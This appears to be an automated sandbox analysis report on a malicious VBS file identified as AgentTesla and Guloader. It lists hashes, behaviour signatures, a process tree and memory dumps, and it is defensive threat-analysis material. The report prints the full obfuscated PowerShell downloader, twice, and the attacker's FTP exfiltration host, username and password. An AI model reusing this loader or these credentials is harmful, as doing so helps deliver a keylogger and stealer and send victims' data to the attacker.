Overview

overview

10

Static

static

1

9421788d58...bs.vbs

windows7-x64

10

9421788d58...bs.vbs

windows10-2004-x64

7

Analysis

  • max time kernel
    143s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20231025-en
  • resource tags

    arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system
  • submitted
    05-12-2023 18:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9421788d5825b5db448507b79370f84e7972a1851fa06730423e0a3176a164c3vbs.vbs

  • Size

    54KB

  • MD5

    efe89d1da63404c434d56b59b1c3c6bd

  • SHA1

    51d3bd2d1bc60a598f6fb26613732d3c3444dd92

  • SHA256

    9421788d5825b5db448507b79370f84e7972a1851fa06730423e0a3176a164c3

  • SHA512

    bb4e6a91649558d1933039a589a28a80455610b1199d05f3b9b5b15ecd22352fb7df6e91ed579ed0cdce120d157b374062cb755e95674a85fe0db7985a5e7952

  • SSDEEP

    768:xrjq4Kw/FiEVWKbkNJFuABuTunNWQwB4JAkIx3TUqtp8s:R+4JdNbkLFuAgiEQw2J5STz2s

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.mcmprint.net
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    pK@7[r0Y?XFT

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9421788d5825b5db448507b79370f84e7972a1851fa06730423e0a3176a164c3vbs.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2084
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Protozoacide1759 ($gruyere){$war = $gruyere.Length-1; For ($Hoatzins64=6; $Hoatzins64 -lt $war){$plasmodesma=$plasmodesma+$gruyere.Substring( $Hoatzins64, 1);$Hoatzins64+=7;}$plasmodesma;}$Benumbs=Protozoacide1759 ' AnparhLeptoctSuckertSolgulpAfstte:Friboh/Sensum/ PantetIndflehEnasceeSigneriDybdeslMethadoNoncomvoxaloneSkndsem ThroweConsolpGuddomoOsteecdGcellec ConstaScutels CathatSensic.CinofocprotegoHeines.AviseruUnmeankFejlsg/BusinewCorbevp Drift- ToftliOmbygnnAabnincerhverl Caretu LnmoddOldingeGrossesRegeri/gabioniAftjekmBrreboatrffevgIngsedeRepertsUdearb/ UnabaCDecurreElavstnAquosetBrudefrVapoura Forskl Quinya SkolefMyrciarDenatuiUsaglikUndersa NitronWidowie UnmysrBeaandnAmmutueNoncapsJillie.Ischioh Adulah RandipAfrodi ';$plasmodesma01=Protozoacide1759 'UncirciZofiaseIntervx Besva ';$Pilgrimizes = Protozoacide1759 ' Roman\InexplsBoelinyTritansBaadehwFiskefo Sulphw Outty6seriou4democr\ScholiWDissekiSnurpenDaimyodIttkomoHypothwCirodisUpholdP Lachro rimetwPaskviebajonerHenennSPlayerhFordmme LangelSeveralReveto\Nicysmvoverco1 Kimbe.Skrmfe0absent\AnskuepRefertokonstiwMadnine SelvhrBenzots DijudhLiatrieRingorl UncurlSupped.OverrkeGorhenxLiberaeSoftdr ';& ($plasmodesma01) (Protozoacide1759 ' Sjles$FiskedUSandblnSulphamUnderdanaugahnlagerei AntikaUjaevncMesioca TubbilScript2Custos=Phenox$ PositeAmatrnngraduevMacren:ImudstwIllimii Afkapn StrnidStainai AfnderStraig ') ;& ($plasmodesma01) (Protozoacide1759 'Skoldh$LaerepPSubintiStearnlProsadg FibrirsuspeniSkratgmSanctuiRealskzCordite Grosss Misfo=archeu$ ZoonoURepresn ProofmfljlshaBomuldnHealysiStvninaImmunocChapmaaReflecl Ineme2Jernfi+Potpou$BylivsPKlasesiMadneplAutopsgKlasserUbarmhiPlaylimTotonaiWoolprzFoedere Insuls Passi ') ;. ($plasmodesma01) (Protozoacide1759 'Smergl$forlemTPseudoeBaxresgPrvninnCryogekdeposiaVeritapPlatteaBeboelcSupramiTabbiltGalpeneSlethvtVejrfoeSeparanOmformsDidrac2Friare0Idahoa Outadm=Fremme Ambeer(Fodgng(TollekgUnpligwLambermCunyieiNonmed KlagebwNicoliiDrilsknAngrib3Prgnan2Hadrom_DeaktipAerolorHidingoUnsweec Lavmae ForgrsCyanocsfarrag macul- ForfrFLenche massefPVikarir francoMinimecforjase SynoesLaryngsAfregnISprogldUnobst= Synon$Upward{TankelPaptereIKirtelD Thail}Billho)Modskr.UslingCHyemaloArbejdmZeugmamMisestaAfgiftn TylendWeseexLstatsbiAlischnafskraeBrunjo)sequen Dagle-UdhamrsStinkspFilibulDebutriFsyrlotSalien Minime[Sprgsmc XanthhPhytoca Resupr Indeb]Stoppe3Datida4Samleo ');&($plasmodesma01) (Protozoacide1759 'Ssport$EpochiSSpectrkSisualrChokolustigerp GeochlUdsprneOuzoamr NarronStjsvaeUdspilsWalesb Nonpen=Maetam Barkar$ UnderT Tuumhe SyredgComiconCormelk AvokaaNurlytpRudekua TranscBloknri Cimbrt Eclecemoundut StraaeTranspnApplaussquame2 Teglv0buchar[Thailn$BredspTPlumbueGarantgHygiennbureaukDortyraSparklpEpidera DegagcDeodoriAghasttFratche Rentet diagre FoldtnSoaptasBakkes2Tjekke0Vealsk.Feltnucpotmado CelebuComposnEpipast Refor-Kolleg2 Sydaf] Skovp ');. ($plasmodesma01) (Protozoacide1759 ' uncon$AffilehSymphyyBaadvrdSokmooruintjioAssyresStormraReprodrOssificStokkooTransfc GelpjeTympanlShipmaeAtelie=Smackm( FdrenTDybdepeLedelis SkabatTabtyp-kommisPSyntomaMarekatFerromh Burno Brouhy$GrandiP Hepari BaandlKonstig Predir InddtiDreadnmAntiraiLedemozPoeticeNoteaps Progg)Routin Jamesy-TidiseA Hydron taterdRbdigh Plimso(Alined[InficeISepulcnBilradtMoldedPBanefut BeskfrFertil]Selska:Sports:UndsetsJuratiiStereoztermomeWinche Gudbjr-fdselse OctopqSesqui Depres8Person)Skorpe ') ;if ($hydrosarcocele) {& $Pilgrimizes $Skruplernes;} else {;$plasmodesma00=Protozoacide1759 'MirrorSAllergt ElsdyaparamerDagsprtRaderv- FrisrB CoosoiOrdinatHalmhus DatamT synoerWhiteaaUncoupnDesulps IncurfSanguieSmellsrRampan Cirkus-BevaegSHensetoUnfrinuBasteprAlarmecToothpe Drude Spritk$ HaardBLollanebarbeqnprecluu DactymStaldkb QuichsSwitch unison-unshapD Salame TeledsSecondtForskniRevacanCertifaOvernitTriangiperjuroAmniaanCessio Comman$FdrelaUForbasnUdlserm NavigaAllheanUdmattiDemonsaMinaricPotichaUnperslSpidsn2Minist ';. ($plasmodesma01) (Protozoacide1759 ' Sugge$GlgninUGrundsnHeadstmJargona CyclonDelstaiUdryddaPropaecsystemaPladealRdsels2Territ=Ichneu$Skillie bosonnPostervImpone:Troldea naalepAlimenp SanggdDislodaSybaritAeratia Ferie ') ;& ($plasmodesma01) (Protozoacide1759 'VadskkI Disagm MaskipForejuoLanolirUnsneetSpidsl-FritidMUnchano ZygomdblanksuInfluelPetunieOpfatt CharmeBGraeaeiSpiloptArchimsBirthwTBoligmrneddmpa SofacnKvikkesDivertfPejlsteSelmakrUdokum ') ;$Unmaniacal2=$Unmaniacal2+'\Kredittimernes149.Vid';while (-not $Staalfjederens) {. ($plasmodesma01) (Protozoacide1759 'nummer$FlagstSRetsvitOdelpsaNaesteaSkalaelCuringfCeratij SlodmeTagkondDoctrieLidelsr Spraye airwoneuropas hasti=Justit(StraalTSwipeaeSektensRachistTvinge-AfbetaPMuseumaFinanstPreconhAttrib Dumple$ParagrURebrainMentpimBrevflaPaleodnChartoiDryadeaInnovacJolleramungoolDmpefi2Jambon)Forsor ') ;. ($plasmodesma01) $plasmodesma00;& ($plasmodesma01) (Protozoacide1759 ' CycliSTunfist Brneaa PrintrVinjast Ersta-remissSlibatilsubstaeGenople VindgpTegume Lrerin5Dussel ');}. ($plasmodesma01) (Protozoacide1759 'Bambus$ GaspePAbreacrDuelbcoforhjetEventuoSedimez HypohoRuinataEkspercImpassifortrddSignaleWelshe1Udpump7Snailm5Follik Tubbab= Skval TransiGValdusePalliatSnegle-KontraCSondenoHuishenguerdotFuglereShindln ForldtNonsub Nedsla$JobskaU Kongen PersomRvrenda ErogenZeneloiSpheciaTeakeucErfariaProctolDissim2Kamele ');& ($plasmodesma01) (Protozoacide1759 'Grundl$MumforTSubgrawMousseiReflownNebulobPalmare JiujirLogikarSubscaiTicismeTravhesvgtska Speede=Fdehje Overgr[PrograSFarveayAlkalisUnkenntPenmateUnpendmEvigtg.DimeriCGalehuoDivisinPramblvBorsyreUndenorUngarnt Exper]Sanaip:Synapt: SubglF RaaddrKolporoAdagiom LigenBUdtrykaStnnersForgafeCulver6cotran4SaftfuSRegimetBevillrRylerniBugtenn SermogLgmand(Stoset$TrimniPConducrVendetoTegnfetRorsmaoCoherez hulkoosolderaSkalkecSwunghiBlaamedParrakeSignif1ullman7Overni5Droger)Relati ');. ($plasmodesma01) (Protozoacide1759 'Besgst$ Hexdrp unhumlEnneataEpidias BoomemUngeolo FlyvedAltsaxeMounses NonvomHoloheaPiacul2Materi Punged=kvadra Filmin[elbilsS NgtelySkindfssignalt PeaceeKondemmAkkomo.PlukkeTHalvuledehumixBathsnt Unbar.SpisepE DeodonbruitecUtakneoAktiond WestsiKrakennCheesegStvleh]Sirene:Befurb:StribeAAkupunSKitinsCRakersI filmnILabore.ScouriGVideoaeWomandtwanernSFrenchtStabejrAfgangiAffutanFemtetgoliefy(Ryglns$BerainTSonderwAfstani TilvnnFornyebDiamaneAfnatir KnobbrPreacuiAffyrieSelvklsNotica)Tulare ');. ($plasmodesma01) (Protozoacide1759 'Typolo$RaastoAOratorrGaardsm KirkeaAntifinTurken=Vagant$Daubedpobeylilfyrenda EgyptsDetermmSnegleo HaarbdPrivate SupersSchistmUnsteraDaasel2 Kaver.HeatlisFiskefuKrybekbFosslfsgngerrtTrykimr HemliiProjeknEdgermgTilbje( Amtsk2Bodger9Staalu9Mening5Krumta4Colipu3 Glase, Lrerm2Applik6 River1Herrnh4Graato8Broder)Reutte ');& ($plasmodesma01) $Arman;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2516
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Protozoacide1759 ($gruyere){$war = $gruyere.Length-1; For ($Hoatzins64=6; $Hoatzins64 -lt $war){$plasmodesma=$plasmodesma+$gruyere.Substring( $Hoatzins64, 1);$Hoatzins64+=7;}$plasmodesma;}$Benumbs=Protozoacide1759 ' AnparhLeptoctSuckertSolgulpAfstte:Friboh/Sensum/ PantetIndflehEnasceeSigneriDybdeslMethadoNoncomvoxaloneSkndsem ThroweConsolpGuddomoOsteecdGcellec ConstaScutels CathatSensic.CinofocprotegoHeines.AviseruUnmeankFejlsg/BusinewCorbevp Drift- ToftliOmbygnnAabnincerhverl Caretu LnmoddOldingeGrossesRegeri/gabioniAftjekmBrreboatrffevgIngsedeRepertsUdearb/ UnabaCDecurreElavstnAquosetBrudefrVapoura Forskl Quinya SkolefMyrciarDenatuiUsaglikUndersa NitronWidowie UnmysrBeaandnAmmutueNoncapsJillie.Ischioh Adulah RandipAfrodi ';$plasmodesma01=Protozoacide1759 'UncirciZofiaseIntervx Besva ';$Pilgrimizes = Protozoacide1759 ' Roman\InexplsBoelinyTritansBaadehwFiskefo Sulphw Outty6seriou4democr\ScholiWDissekiSnurpenDaimyodIttkomoHypothwCirodisUpholdP Lachro rimetwPaskviebajonerHenennSPlayerhFordmme LangelSeveralReveto\Nicysmvoverco1 Kimbe.Skrmfe0absent\AnskuepRefertokonstiwMadnine SelvhrBenzots DijudhLiatrieRingorl UncurlSupped.OverrkeGorhenxLiberaeSoftdr ';& ($plasmodesma01) (Protozoacide1759 ' Sjles$FiskedUSandblnSulphamUnderdanaugahnlagerei AntikaUjaevncMesioca TubbilScript2Custos=Phenox$ PositeAmatrnngraduevMacren:ImudstwIllimii Afkapn StrnidStainai AfnderStraig ') ;& ($plasmodesma01) (Protozoacide1759 'Skoldh$LaerepPSubintiStearnlProsadg FibrirsuspeniSkratgmSanctuiRealskzCordite Grosss Misfo=archeu$ ZoonoURepresn ProofmfljlshaBomuldnHealysiStvninaImmunocChapmaaReflecl Ineme2Jernfi+Potpou$BylivsPKlasesiMadneplAutopsgKlasserUbarmhiPlaylimTotonaiWoolprzFoedere Insuls Passi ') ;. ($plasmodesma01) (Protozoacide1759 'Smergl$forlemTPseudoeBaxresgPrvninnCryogekdeposiaVeritapPlatteaBeboelcSupramiTabbiltGalpeneSlethvtVejrfoeSeparanOmformsDidrac2Friare0Idahoa Outadm=Fremme Ambeer(Fodgng(TollekgUnpligwLambermCunyieiNonmed KlagebwNicoliiDrilsknAngrib3Prgnan2Hadrom_DeaktipAerolorHidingoUnsweec Lavmae ForgrsCyanocsfarrag macul- ForfrFLenche massefPVikarir francoMinimecforjase SynoesLaryngsAfregnISprogldUnobst= Synon$Upward{TankelPaptereIKirtelD Thail}Billho)Modskr.UslingCHyemaloArbejdmZeugmamMisestaAfgiftn TylendWeseexLstatsbiAlischnafskraeBrunjo)sequen Dagle-UdhamrsStinkspFilibulDebutriFsyrlotSalien Minime[Sprgsmc XanthhPhytoca Resupr Indeb]Stoppe3Datida4Samleo ');&($plasmodesma01) (Protozoacide1759 'Ssport$EpochiSSpectrkSisualrChokolustigerp GeochlUdsprneOuzoamr NarronStjsvaeUdspilsWalesb Nonpen=Maetam Barkar$ UnderT Tuumhe SyredgComiconCormelk AvokaaNurlytpRudekua TranscBloknri Cimbrt Eclecemoundut StraaeTranspnApplaussquame2 Teglv0buchar[Thailn$BredspTPlumbueGarantgHygiennbureaukDortyraSparklpEpidera DegagcDeodoriAghasttFratche Rentet diagre FoldtnSoaptasBakkes2Tjekke0Vealsk.Feltnucpotmado CelebuComposnEpipast Refor-Kolleg2 Sydaf] Skovp ');. ($plasmodesma01) (Protozoacide1759 ' uncon$AffilehSymphyyBaadvrdSokmooruintjioAssyresStormraReprodrOssificStokkooTransfc GelpjeTympanlShipmaeAtelie=Smackm( FdrenTDybdepeLedelis SkabatTabtyp-kommisPSyntomaMarekatFerromh Burno Brouhy$GrandiP Hepari BaandlKonstig Predir InddtiDreadnmAntiraiLedemozPoeticeNoteaps Progg)Routin Jamesy-TidiseA Hydron taterdRbdigh Plimso(Alined[InficeISepulcnBilradtMoldedPBanefut BeskfrFertil]Selska:Sports:UndsetsJuratiiStereoztermomeWinche Gudbjr-fdselse OctopqSesqui Depres8Person)Skorpe ') ;if ($hydrosarcocele) {& $Pilgrimizes $Skruplernes;} else {;$plasmodesma00=Protozoacide1759 'MirrorSAllergt ElsdyaparamerDagsprtRaderv- FrisrB CoosoiOrdinatHalmhus DatamT synoerWhiteaaUncoupnDesulps IncurfSanguieSmellsrRampan Cirkus-BevaegSHensetoUnfrinuBasteprAlarmecToothpe Drude Spritk$ HaardBLollanebarbeqnprecluu DactymStaldkb QuichsSwitch unison-unshapD Salame TeledsSecondtForskniRevacanCertifaOvernitTriangiperjuroAmniaanCessio Comman$FdrelaUForbasnUdlserm NavigaAllheanUdmattiDemonsaMinaricPotichaUnperslSpidsn2Minist ';. ($plasmodesma01) (Protozoacide1759 ' Sugge$GlgninUGrundsnHeadstmJargona CyclonDelstaiUdryddaPropaecsystemaPladealRdsels2Territ=Ichneu$Skillie bosonnPostervImpone:Troldea naalepAlimenp SanggdDislodaSybaritAeratia Ferie ') ;& ($plasmodesma01) (Protozoacide1759 'VadskkI Disagm MaskipForejuoLanolirUnsneetSpidsl-FritidMUnchano ZygomdblanksuInfluelPetunieOpfatt CharmeBGraeaeiSpiloptArchimsBirthwTBoligmrneddmpa SofacnKvikkesDivertfPejlsteSelmakrUdokum ') ;$Unmaniacal2=$Unmaniacal2+'\Kredittimernes149.Vid';while (-not $Staalfjederens) {. ($plasmodesma01) (Protozoacide1759 'nummer$FlagstSRetsvitOdelpsaNaesteaSkalaelCuringfCeratij SlodmeTagkondDoctrieLidelsr Spraye airwoneuropas hasti=Justit(StraalTSwipeaeSektensRachistTvinge-AfbetaPMuseumaFinanstPreconhAttrib Dumple$ParagrURebrainMentpimBrevflaPaleodnChartoiDryadeaInnovacJolleramungoolDmpefi2Jambon)Forsor ') ;. ($plasmodesma01) $plasmodesma00;& ($plasmodesma01) (Protozoacide1759 ' CycliSTunfist Brneaa PrintrVinjast Ersta-remissSlibatilsubstaeGenople VindgpTegume Lrerin5Dussel ');}. ($plasmodesma01) (Protozoacide1759 'Bambus$ GaspePAbreacrDuelbcoforhjetEventuoSedimez HypohoRuinataEkspercImpassifortrddSignaleWelshe1Udpump7Snailm5Follik Tubbab= Skval TransiGValdusePalliatSnegle-KontraCSondenoHuishenguerdotFuglereShindln ForldtNonsub Nedsla$JobskaU Kongen PersomRvrenda ErogenZeneloiSpheciaTeakeucErfariaProctolDissim2Kamele ');& ($plasmodesma01) (Protozoacide1759 'Grundl$MumforTSubgrawMousseiReflownNebulobPalmare JiujirLogikarSubscaiTicismeTravhesvgtska Speede=Fdehje Overgr[PrograSFarveayAlkalisUnkenntPenmateUnpendmEvigtg.DimeriCGalehuoDivisinPramblvBorsyreUndenorUngarnt Exper]Sanaip:Synapt: SubglF RaaddrKolporoAdagiom LigenBUdtrykaStnnersForgafeCulver6cotran4SaftfuSRegimetBevillrRylerniBugtenn SermogLgmand(Stoset$TrimniPConducrVendetoTegnfetRorsmaoCoherez hulkoosolderaSkalkecSwunghiBlaamedParrakeSignif1ullman7Overni5Droger)Relati ');. ($plasmodesma01) (Protozoacide1759 'Besgst$ Hexdrp unhumlEnneataEpidias BoomemUngeolo FlyvedAltsaxeMounses NonvomHoloheaPiacul2Materi Punged=kvadra Filmin[elbilsS NgtelySkindfssignalt PeaceeKondemmAkkomo.PlukkeTHalvuledehumixBathsnt Unbar.SpisepE DeodonbruitecUtakneoAktiond WestsiKrakennCheesegStvleh]Sirene:Befurb:StribeAAkupunSKitinsCRakersI filmnILabore.ScouriGVideoaeWomandtwanernSFrenchtStabejrAfgangiAffutanFemtetgoliefy(Ryglns$BerainTSonderwAfstani TilvnnFornyebDiamaneAfnatir KnobbrPreacuiAffyrieSelvklsNotica)Tulare ');. ($plasmodesma01) (Protozoacide1759 'Typolo$RaastoAOratorrGaardsm KirkeaAntifinTurken=Vagant$Daubedpobeylilfyrenda EgyptsDetermmSnegleo HaarbdPrivate SupersSchistmUnsteraDaasel2 Kaver.HeatlisFiskefuKrybekbFosslfsgngerrtTrykimr HemliiProjeknEdgermgTilbje( Amtsk2Bodger9Staalu9Mening5Krumta4Colipu3 Glase, Lrerm2Applik6 River1Herrnh4Graato8Broder)Reutte ');& ($plasmodesma01) $Arman;}"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:320
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
          4⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2464

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    1850e5c3e2585fcc073d6c96bd4f0506

    SHA1

    04a6c76b572cefa147220f44c9c9b2d2b4601529

    SHA256

    bb8a6160887eb01dca26ea9dd6dd2b973c198b4b2ee3062d9657ccee6389586d

    SHA512

    8d66a0141e7abe7f26f942789c39299fbd5b77e608b64115b2951deb646668cf318f4a9d66c14f62308290e2c405e145a59250915abb8899f43fbe781b094e1c

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab2FF8.tmp
    Filesize

    61KB

    MD5

    f3441b8572aae8801c04f3060b550443

    SHA1

    4ef0a35436125d6821831ef36c28ffaf196cda15

    SHA256

    6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

    SHA512

    5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar2FFB.tmp
    Filesize

    163KB

    MD5

    9441737383d21192400eca82fda910ec

    SHA1

    725e0d606a4fc9ba44aa8ffde65bed15e65367e4

    SHA256

    bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

    SHA512

    7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar3281.tmp
    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T437Z8MHLV9JJ0TRD81J.temp
    Filesize

    7KB

    MD5

    4b7f4aeded4b6f829e722b5bfd1e2695

    SHA1

    0a9e94af60275094b137ab6deab9b3ad9643b0be

    SHA256

    e0f23dd33ad98cee11628d8de5377281b414ce1958a78ec44720f8416fe8bf2a

    SHA512

    24bde272b37b3d53a122cc6952b9ebf1bd869e7cce3d5edf2b2b646fbdd16820f9b30677f674669b75bed07056d064a01aed0d5e9a412c2c271b053a75b7fc4b

    Download Submit

  • memory/320-103-0x0000000073B20000-0x00000000740CB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/320-104-0x0000000002170000-0x00000000021B0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/320-119-0x0000000006350000-0x0000000008E8E000-memory.dmp

    Filesize

    43.2MB

    Download

  • memory/320-118-0x0000000073B20000-0x00000000740CB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/320-113-0x0000000006350000-0x0000000008E8E000-memory.dmp

    Filesize

    43.2MB

    Download

  • memory/320-84-0x0000000073B20000-0x00000000740CB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/320-85-0x0000000002170000-0x00000000021B0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/320-86-0x0000000002170000-0x00000000021B0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/320-112-0x0000000077CD0000-0x0000000077DA6000-memory.dmp

    Filesize

    856KB

    Download

  • memory/320-111-0x0000000077AE0000-0x0000000077C89000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/320-108-0x0000000006350000-0x0000000008E8E000-memory.dmp

    Filesize

    43.2MB

    Download

  • memory/320-107-0x0000000002170000-0x00000000021B0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/320-106-0x0000000006350000-0x0000000008E8E000-memory.dmp

    Filesize

    43.2MB

    Download

  • memory/320-105-0x0000000005180000-0x0000000005181000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2464-117-0x0000000001410000-0x0000000003F4E000-memory.dmp

    Filesize

    43.2MB

    Download

  • memory/2464-120-0x000000006FDF0000-0x000000006FE30000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2464-130-0x00000000217A0000-0x00000000217E0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2464-129-0x000000006F660000-0x000000006FD4E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/2464-126-0x0000000077AE0000-0x0000000077C89000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/2464-125-0x0000000001410000-0x0000000003F4E000-memory.dmp

    Filesize

    43.2MB

    Download

  • memory/2464-123-0x00000000217A0000-0x00000000217E0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2464-122-0x000000006F660000-0x000000006FD4E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/2464-116-0x000000006FDF0000-0x0000000070E52000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2464-115-0x0000000077AE0000-0x0000000077C89000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/2464-114-0x0000000001410000-0x0000000003F4E000-memory.dmp

    Filesize

    43.2MB

    Download

  • memory/2516-121-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2516-77-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2516-81-0x0000000002400000-0x0000000002480000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2516-79-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2516-80-0x0000000002400000-0x0000000002480000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2516-75-0x000000001B2A0000-0x000000001B582000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2516-78-0x0000000002400000-0x0000000002480000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2516-76-0x0000000002050000-0x0000000002058000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2516-98-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2516-99-0x0000000002400000-0x0000000002480000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2516-100-0x0000000002400000-0x0000000002480000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2516-101-0x0000000002400000-0x0000000002480000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2516-102-0x0000000002400000-0x0000000002480000-memory.dmp

    Filesize

    512KB

    Download